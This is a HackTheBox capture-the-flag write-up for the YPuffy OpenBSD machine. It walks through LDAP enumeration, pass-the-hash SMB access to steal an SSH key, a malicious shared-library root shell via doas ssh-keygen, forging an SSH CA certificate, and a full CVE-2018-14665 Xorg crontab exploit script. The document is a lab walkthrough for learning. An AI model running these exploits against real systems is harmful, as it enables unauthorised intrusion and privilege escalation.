Post

HackTheBox YPuffy Writeup

Posted
By x3ric
4 min read

Explore the fundamentals of cybersecurity in the YPuffy Capture The Flag (CTF) challenge, a medium-level experience! This straightforward CTF writeup provides insights into key concepts with clarity and simplicity, making it accessible for players at this level.

Add Hosts

1

10.10.10.107 ypuffy.htb

Script to add hosts automatically

1
2
3

ip="10.10.10.107"
domain="ypuffy.htb"
grep -qF "$ip $domain" /etc/hosts || echo -e "$ip $domain" | sudo tee -a /etc/hosts

Mapping

1

nmap -sCV ypuffy.htb

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

Nmap scan report for ypuffy.htb (10.10.10.107)
Host is up (0.050s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 2e:19:e6:af:1b:a7:b0:e8:07:2a:2b:11:5d:7b:c6:04 (RSA)
|   256 dd:0f:6a:2a:53:ee:19:50:d9:e5:e7:81:04:8d:91:b6 (ECDSA)
|_  256 21:9e:db:bd:e1:78:4d:72:b0:ea:b4:97:fb:7f:af:91 (ED25519)
80/tcp  open  http        OpenBSD httpd
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: YPUFFY)
389/tcp open  ldap        (Anonymous bind OK)
445/tcp open  netbios-ssn Samba smbd 4.7.6 (workgroup: YPUFFY)
Service Info: Host: YPUFFY

Host script results:
| smb2-time: 
|   date: 2024-10-12T07:26:44
|_  start_date: N/A
|_clock-skew: mean: 1h19m58s, deviation: 2h18m34s, median: -2s
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.7.6)
|   Computer name: ypuffy
|   NetBIOS computer name: YPUFFY\x00
|   Domain name: hackthebox.htb
|   FQDN: ypuffy.hackthebox.htb
|_  System time: 2024-10-12T03:26:45-04:00

LDAP and SMB Privilege Escalation on OpenBSD

An Nmap scan shows that LDAP allows anonymous login:

1

389/tcp open  ldap        (Anonymous bind OK)

You can refer to HackTricks: Pentesting LDAP for more insights.

LDAP Enumeration and Finding Alice’s Hash

First, enumerate the LDAP service:

1
2

dc=$(ldapsearch -x -H ldap://ypuffy.htb -s base "namingcontexts" | sed -n 's/^.*namingContexts: //p')
ldapsearch -x -H ldap://ypuffy.htb -b "$dc"

Alternatively, use Nmap for LDAP enumeration:

1

nmap -n -sV --script "ldap* and not brute" ypuffy.htb

During the enumeration, you’ll find the sambaNTPassword hash for user alice1978.

Access SMB Shares and Download Private Key

Use Alice’s hash to list SMB shares and download her private key:

1
2

smbmap -u alice1978 -p '00000000000000000000000000000000:0B186E661BBDBDCF6047784DE8B9FD8B' -H ypuffy.htb -r
smbmap -u alice1978 -p '00000000000000000000000000000000:0B186E661BBDBDCF6047784DE8B9FD8B' -H ypuffy.htb --download alice/my_private_key.ppk

Convert Key to OpenSSH and SSH into the Machine

Convert the .ppk key to OpenSSH format and clean up:

1
2

puttygen 10.10.10.107-alice_my_private_key.ppk -O private-openssh -o alice_private.key
rm -rf 10.10.10.107-alice_my_private_key.ppk

Now, SSH into the machine:

1

ssh -i alice_private.key alice1978@ypuffy.htb

Retrieve the user flag:

1

cat user.txt

Privilege Escalation via doas

Check the doas configuration:

1

cat /etc/doas.conf

Alice is allowed to run ssh-keygen as userca:

1
2

permit keepenv :wheel
permit nopass alice1978 as userca cmd /usr/bin/ssh-keygen

With this, you can further escalate privileges.

SSH-Keygen Privilege Escalation

Using information from GTFOBins: ssh-keygen, we can exploit the ability to load arbitrary libraries as userca. While switching to userca isn’t strictly necessary, I did so to explore and test shell payloads in .so libraries.

1
2
3

cd /tmp
nano poc.c
gcc -shared -fPIC -o lib.so poc.c

1
2
3
4
5
6
7
8
9
10
11
12
13

#include <stdio.h>
#include <unistd.h>

#define SHELL_PATH "/bin/sh"
#define SHELL_COMMAND "/bin/sh"
 
void __attribute__ ((constructor)) constructor()
{
    puts("[starting shell]");
    printf("Starting %s\n", SHELL_COMMAND);
    long long err = execl(SHELL_PATH, SHELL_PATH, "-c", SHELL_COMMAND, NULL);
    printf("Result: %lld\n", err);
}

Next, use ssh-keygen to load the malicious library:

1

doas -u userca /usr/bin/ssh-keygen -D ./lib.so

Now, we have escalated privileges to userca:

1
2

ypuffy$ id
uid=1001(userca) gid=1001(userca) groups=1001(userca)

1

cat /etc/ssh/ssh_config

The presence of AuthorizedKeysCommand, AuthorizedPrincipalsCommand, and TrustedUserCAKeys /home/userca/ca.pub indicates that a Certificate Authority (CA) is in place for SSH authentication.

1
2
3
4

cd /home/userca/.ssh
ssh-keygen -t ecdsa
/usr/bin/ssh-keygen -s /home/userca/ca -I alice1978 -n "$(curl -s "http://127.0.0.1/sshauth?type=principals&username=root")" -z 1 id_ecdsa.pub
ssh -i  id_ecdsa root@localhost

1

cat /root/root.txt

CVE-2018-14665 Exploitation on OpenBSD

Alternative Privilege Escalation

To verify the system version, run:

1

uname -a

Example output:

1

OpenBSD ypuffy.hackthebox.htb 6.3 GENERIC#100 amd64

This version, OpenBSD 6.3, is vulnerable to CVE-2018-14665, a flaw that allows privilege escalation due to improper handling of X server access controls.

For detailed exploitation steps, refer to the Exploit-DB entry.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20

cat << EOF > /tmp/xorgasm
cp /bin/sh /usr/local/bin/pwned
echo "main(){setuid(0);setgid(0);system(\"/bin/sh\");}" > /tmp/pwned.c
gcc /tmp/pwned.c -o /usr/local/bin/pwned
chmod 4777 /usr/local/bin/pwned
EOF
chmod +x /tmp/xorgasm
cd /etc
Xorg -fp "* * * * * root /tmp/xorgasm" -logfile crontab :1 &
sleep 5
pkill Xorg
echo
echo "Be patient for a couple of minutes..."
echo
sleep 120
echo
echo "Don't forget to cleanup and run crontab -e to reload the crontab."
ls -l /etc/crontab*
ls -l /usr/local/bin/pwned
/usr/local/bin/pwned
ctf
htb cft writeup linux openbsd cve-2018-14665
This post is licensed under CC BY 4.0 by the author.